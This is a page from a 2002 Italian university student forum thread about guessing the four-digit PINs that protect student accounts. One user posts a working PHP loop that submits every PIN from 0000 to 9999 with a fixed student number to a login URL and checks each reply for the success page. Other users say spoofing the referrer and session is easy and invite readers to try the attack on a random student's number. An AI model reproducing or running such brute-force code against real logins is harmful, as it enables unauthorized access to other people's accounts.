Dsy Network www | forum | my | didattica | howto | wiki | el goog | stats | blog | dona | rappresentanti
Homepage
 Register   Calendar   Members  Faq   Search  Logout 
.dsy:it. : Powered by vBulletin version 2.3.1 .dsy:it. > Community > Forum De Bell Tolls > Il PIN degli studenti... Thread Rating: 1 votes, 1.00 average.
Pages (2): « 1 [2]   Last Thread   Next Thread
Author
Thread    Expand all | Contract all    Post New Thread    Post A Reply
Collapse
Mino
In pensione :)

User info:
Registered: Mar 2002
Posts: 2997 (0.34 al dì)
Location: Dublin!
Corso: Informatica 3ennale
Anno: Laureato :)
Time Online: 12 Days, 2:11:07: [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

vecchia. :)


un pin di 4 cifre, con un 56k e un 386 lo sgami in una 30ina di secondi se non ci sono politiche di disabilitazione dopo x tentativi oppure un ritardo dopo l'nesimo errore.

__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani

25-11-2002 11:53
Click Here to See the Profile for Mino Click Here to See the Blog of Mino Visit Mino's homepage! Find more posts by Mino Add Mino to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
Lord
.consigliere.

User info:
Registered: Jul 2002
Posts: 115 (0.01 al dì)
Location: Pavia
Corso: informatica
Anno: 4
Time Online: 12:06:59 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Pardon, ma come funzionerebbe un programma che provi diverse combinazioni? Ovvero: costruire un programmino in c che generi e provi vari numeri sono capace anche io. Come però inviare il numero generato al sito e "leggere" la risposta?

int main (void)
{
int n = 0; bool don't_connect = false;
while (don't_connect==false) { genera_numero(&n); don't_connect = prova_numero(&n);}
genera_danno(); 8-)
}

26-11-2002 12:43
Click Here to See the Profile for Lord Click here to Send Lord a Private Message Find more posts by Lord Add Lord to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
URANIO
.utente.radioattivo

User info:
Registered: Nov 2001
Posts: 1011 (0.11 al dì)
Location: Casalpusterlengo (LO)
Corso: TICo
Anno:
Time Online: 11 Days, 6:12:08: [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Probabilmente la login viene inviato attraverso un comando post o get al server .....quindi basta controllare la form e fare l'invio!
Per controllare basta vedere quello ch ti rimanda il server..almeno penso!:|

__________________
BinarySun
"L'intelligenza è una pianta che va curata continuamente.
Dovreste vedere com'è bello, il mio bonsai."
Rat-man®

26-11-2002 21:42
Click Here to See the Profile for URANIO Click here to Send URANIO a Private Message Find more posts by URANIO Add URANIO to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
Mino
In pensione :)

User info:
Registered: Mar 2002
Posts: 2997 (0.34 al dì)
Location: Dublin!
Corso: Informatica 3ennale
Anno: Laureato :)
Time Online: 12 Days, 2:11:07: [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

isi...

se il form non fa un controllo del referrer basta un fopen in php

PHP:

$trovato = 0;
$pin = 0;

while(!$trovato) {
$url=sprintf("http://www.dominio.it/path/del/cgi?matr=123123&pin=%04d",$pin);
$pin++;

$fp = fopen($url,"r");
if (!$fp) {
echo "squaraus!";
exit(-1);
}

$line = fgets ($fp, 1024);  // ecc ecc

// banalissima regexp che valuta l'output in $line cercando un pezzo di html che appare nella pagina di successo
// se lo trova pone $trovato=1

fclose($fp);
}

echo "Il pin è $pin\n";



altrimenti è altrettanto stupido, basta una fsockopen per aprire una socket su www.dominio.it alla porta 80 e quindi passare i vari parametri ("GET /path/blabla...")...

__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani

26-11-2002 22:26
Click Here to See the Profile for Mino Click Here to See the Blog of Mino Visit Mino's homepage! Find more posts by Mino Add Mino to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
drakend
.grande:maestro.

User info:
Registered: Oct 2002
Posts: 1857 (0.22 al dì)
Location:
Corso:
Anno:
Time Online: 11 Days, 16:15:18 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Mino ma dopo tre errori l'account viene disabilitato o no?
Il referrer dovrebbe essere l'url da cui si proviene: in questa ipotesi non si può alterare la url di provenienza in modo da farla apparire "legale"?

26-11-2002 23:48
Click Here to See the Profile for drakend Click here to Send drakend a Private Message Find more posts by drakend Add drakend to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
Mino
In pensione :)

User info:
Registered: Mar 2002
Posts: 2997 (0.34 al dì)
Location: Dublin!
Corso: Informatica 3ennale
Anno: Laureato :)
Time Online: 12 Days, 2:11:07: [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

la disabilitazione dopo x tentativi non so se ci sia. lo spero vivamente...

falsificare referrer e session è una delle cose più banali che si possan fare :)

tempo fa scrissi per me uno scrippettino chiamato "enblue" per inviare sms da blu.it via shell: si loggava sulla homepage, simulava il click su "invia sms", compilava il modulo e controllava i risultati...

__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani

27-11-2002 12:44
Click Here to See the Profile for Mino Click Here to See the Blog of Mino Visit Mino's homepage! Find more posts by Mino Add Mino to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
URANIO
.utente.radioattivo

User info:
Registered: Nov 2001
Posts: 1011 (0.11 al dì)
Location: Casalpusterlengo (LO)
Corso: TICo
Anno:
Time Online: 11 Days, 6:12:08: [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Secondo me non viene bloccata dopo 3 tentativi!
...se volete provare inserite una matricola a caso e provate (non la mia :D)

__________________
BinarySun
"L'intelligenza è una pianta che va curata continuamente.
Dovreste vedere com'è bello, il mio bonsai."
Rat-man®

27-11-2002 22:45
Click Here to See the Profile for URANIO Click here to Send URANIO a Private Message Find more posts by URANIO Add URANIO to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
Collapse
LoneWolf
.grande:maestro.

User info:
Registered: Nov 2001
Posts: 883 (0.10 al dì)
Location:
Corso: Informatica
Anno: Boh!
Time Online: 2 Days, 0:35:31 [...]
Status: Offline

Post actions:

Edit | Report | IP: Logged

Originally posted by URANIO
Secondo me non viene bloccata dopo 3 tentativi!
...se volete provare inserite una matricola a caso e provate (non la mia :D)


Evitate anche il mio...

__________________
"It is totally natural to die or to be killed, rather than just to live without a certain purpose"

28-11-2002 20:43
Click Here to See the Profile for LoneWolf Click Here to See the Blog of LoneWolf Click here to Send LoneWolf a Private Message Visit LoneWolf's homepage! Find more posts by LoneWolf Add LoneWolf to your buddy list Printer Friendly version Email this Article to a friend Reply w/Quote
All times are GMT. The time now is 05:41.    Post New Thread    Post A Reply
Pages (2): « 1 [2]   Last Thread   Next Thread
Show Printable Version | Email this Page | Subscribe to this Thread | Add to Bookmarks

Forum Jump:
Rate This Thread:

Forum Rules:
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is OFF
vB code is ON
Smilies are ON
[IMG] code is ON
 

Powered by: vBulletin v2.3.1 - Copyright ©2000 - 2002, Jelsoft Enterprises Limited
Mantained by dsy crew (email) | Collabora con noi | Segnalaci un bug | Archive | Regolamento | Licenze | Thanks | Syndacate
Pagina generata in 0.056 seconds (68.46% PHP - 31.54% MySQL) con 23 query.